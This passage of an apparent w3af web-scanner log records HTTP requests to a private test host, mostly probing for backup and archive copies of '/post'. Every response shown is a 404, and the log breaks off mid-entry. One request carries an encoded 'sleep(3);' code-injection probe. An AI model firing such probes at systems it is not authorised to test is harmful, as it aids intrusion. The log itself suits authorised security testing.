            <http-transaction id="341">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="343">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="344">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="345">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Pz6DRpeL HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="346">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="348">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="351">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="354">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="355">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="356">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="357">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="359">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="360">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="361">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="362">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="364">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="366">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="367">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="368">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="370">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="373">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
